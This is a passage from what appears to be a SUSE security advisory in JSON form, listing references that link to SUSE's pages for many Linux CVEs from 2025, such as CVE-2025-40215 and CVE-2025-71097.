"summary": "SUSE CVE CVE-2025-40215 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40215/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40219 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40219/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40220 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40220/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40223 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40223/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40231 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40231/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40233 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40233/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40238 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40238/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40240 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40240/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40242 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40242/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40244 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40244/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40248 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40248/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40250 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40250/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40251 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40251/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40252 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40252/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40254 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40254/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40256 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40256/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40257 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40257/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40258 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40258/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40259 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40259/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40261 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40261/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40262 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40262/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40263 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40263/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40264 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40264/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40268 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40268/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40269 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40269/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40271 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40271/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40272 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40272/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40273 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40273/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40274 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40274/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40275 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40275/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40277 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40277/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40278 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40278/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40279 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40279/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40280 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40280/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40282 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40282/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40283 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40283/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40287 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40287/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40288 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40288/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40289 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40289/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40292 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40292/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40293 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40293/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40297 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40297/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40301 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40301/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40304 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40304/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40306 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40306/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40307 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40307/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40308 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40308/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40309 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40309/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40310 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40310/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40311 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40311/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40312 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40312/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40314 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40314/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40315 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40315/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40316 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40316/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40317 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40317/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40318 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40318/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40319 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40319/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40320 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40320/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40321 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40321/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40322 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40322/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40323 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40323/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40324 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40324/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40328 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40328/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40329 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40329/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40331 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40331/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40337 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40337/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40338 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40338/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40339 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40339/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40342 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40342/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40343 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40343/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40345 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40345/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40346 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40346/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40347 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40347/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40349 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40349/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40350 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40350/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40351 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40351/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40355 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40355/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40360 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40360/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40363 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40363/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68168 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68168/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68171 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68171/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68172 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68172/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68174 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68174/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68176 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68176/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68178 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68178/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68180 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68180/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68183 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68183/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68185 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68185/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68188 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68188/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68190 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68190/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68192 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68192/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68194 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68194/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68195 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68195/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68200 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68200/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68201 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68201/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68204 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68204/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68206 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68206/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68208 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68208/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68209 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68209/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68217 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68217/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68218 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68218/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68222 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68222/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68227 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68227/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68230 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68230/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68233 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68233/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68235 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68235/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68237 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68237/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68238 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68238/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68239 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68239/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68241 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68241/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68244 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68244/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68245 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68245/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68249 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68249/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68252 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68252/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68254 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68254/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68255 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68255/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68256 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68256/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68257 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68257/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68258 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68258/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68259 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68259/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68261 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68261/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68264 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68264/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68285 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68285/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68286 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68286/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68287 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68287/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68289 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68289/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68290 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68290/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68296 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68296/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68297 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68297/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68301 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68301/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68303 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68303/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68305 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68305/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68307 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68307/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68308 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68308/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68312 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68312/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68313 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68313/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68320 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68320/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68325 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68325/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68327 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68327/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68328 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68328/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68330 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68330/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68331 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68331/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68332 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68332/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68335 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68335/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68337 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68337/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68339 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68339/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68340 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68340/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68345 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68345/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68346 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68346/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68347 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68347/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68349 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68349/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68351 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68351/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68354 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68354/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68362 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68362/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68363 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68363/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68365 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68365/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68366 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68366/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68367 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68367/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68372 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68372/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68378 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68378/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68379 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68379/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68380 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68380/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68724 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68724/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68725 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68725/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68727 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68727/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68728 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68728/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68732 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68732/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68733 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68733/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68734 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68734/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68740 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68740/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68742 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68742/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68744 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68744/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68746 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68746/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68750 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68750/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68753 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68753/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68757 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68757/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68758 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68758/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68759 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68759/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68764 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68764/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68765 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68765/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68766 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68766/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68768 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68768/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68770 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68770/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68771 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68771/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68773 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68773/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68775 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68775/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68776 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68776/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68777 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68777/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68783 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68783/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68788 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68788/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68789 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68789/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68795 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68795/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68797 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68797/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68798 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68798/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68800 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68800/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68801 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68801/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68803 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68803/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68804 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68804/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68808 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68808/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68814 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68814/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68815 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68815/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68816 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68816/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68819 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68819/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68820 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68820/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71064 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71064/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71066 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71066/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71077 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71077/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71078 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71078/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71079 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71079/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71081 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71081/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71082 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71082/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71083 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71083/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71084 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71084/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71086 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71086/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71087 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71087/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71088 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71088/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71089 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71089/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71091 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71091/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71093 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71093/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71094 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71094/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71095 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71095/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71096 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71096/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71097 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71097/"
},
{
"category": "self",
